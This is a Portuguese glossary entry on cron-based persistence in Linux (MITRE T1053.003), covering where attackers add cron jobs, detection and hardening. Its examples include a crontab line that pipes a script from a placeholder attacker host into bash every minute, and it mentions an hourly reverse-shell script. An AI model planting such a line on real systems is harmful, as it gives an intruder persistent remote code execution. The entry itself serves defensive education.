Persistência via cron
O que é Persistência via cron?
Persistência via cronTécnica de persistência em Linux e Unix que utiliza cron, anacron ou temporizadores do systemd para reexecutar código do atacante num intervalo ou evento do sistema escolhido.
A persistência via cron (MITRE ATT&CK T1053.003) ataca o daemon cron do Unix e suas variantes (anacron, fcron, temporizadores do systemd). Os atacantes adicionam entradas em /etc/crontab, /etc/cron.d/, /etc/cron.{hourly,daily,weekly,monthly}/ ou crontabs de utilizador (crontab -e). Cargas comuns são reverse shells de uma linha, downloads com curl ou scripts em /tmp. Como o cron corre como root ou como o utilizador proprietário, a técnica é fiável e trivial após o acesso inicial. Deteção: monitorização de integridade dos diretórios cron, regras auditd, baseline de tarefas esperadas e alertas EDR sobre shells geradas pelo cron. Endurecimento: restringir o crontab, montar /tmp com noexec e ativar auditoria do systemd-cron quando disponível.
● Exemplos
- 01
Adicionar * * * * * curl -s http://atacante/sh | bash em /etc/cron.d/update.
- 02
Colocar um script em /etc/cron.hourly/ para reabrir uma reverse shell todas as horas.
● Perguntas frequentes
O que é Persistência via cron?
Técnica de persistência em Linux e Unix que utiliza cron, anacron ou temporizadores do systemd para reexecutar código do atacante num intervalo ou evento do sistema escolhido. Pertence à categoria Ataques e ameaças da cibersegurança.
O que significa Persistência via cron?
Técnica de persistência em Linux e Unix que utiliza cron, anacron ou temporizadores do systemd para reexecutar código do atacante num intervalo ou evento do sistema escolhido.
Como se defender contra Persistência via cron?
As defesas contra Persistência via cron costumam combinar controles técnicos e práticas operacionais, conforme detalhado na definição acima.
Quais são outros nomes para Persistência via cron?
Nomes alternativos comuns: Persistência crontab, Persistência anacron.